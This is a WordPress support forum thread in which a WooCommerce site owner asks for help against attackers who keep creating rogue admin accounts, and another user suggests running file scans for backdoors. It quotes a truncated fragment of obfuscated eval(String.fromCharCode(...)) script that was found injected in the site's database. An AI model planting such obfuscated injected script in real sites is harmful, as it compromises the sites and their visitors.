Admin User creating attack

  • I am facing new admin user creation attack on one of my woocommerce site. The admin user are created with systemusers username and using [email protected] as email address. After creating the user admin and user are getting new user created email notifications. Anyone here face this same problem before??how I can protect my site from this attack???

    When first time user created I found one vulnerable plugin on my site from wordfence scan I have deleted that plugin now and installed iTheme security pro version and enabled 2FA for admin users but after that still 5 times that user is creating on my site.

    I found following code in Db eval(String.fromCharCode(118, 97, 114, 32, 115, 99, 114, 105, 112, 116, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116,

    bye checking this article

    https://www.wordfence.com/blog/2019/08/ongoing-malvertising-campaign-continues-exploiting-new-vulnerabilities/

    But on this article its saying wordfence is blocking these type of attack but after installing wordfence still creating new admin user on our site.

Viewing 2 replies - 1 through 2 (of 2 total)

  • You might make sure the Scan Options to “Scan theme files against repository versions for changes” and “Scan plugin files against repository versions for changes” are enabled. Also “Scan files outside your WordPress installation”. They might have added a backdoor somewhere to allow access.

    Tim

    Thread Starter Sarun developer

    (@saruncloudspring)

    Hi,

    I have done all scanning there is no outside files and malcius are not showing on our site. So how i can find out how they are creating new user ? Also how i can stop this new admin creation attack on my site?

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘Admin User creating attack’ is closed to new replies.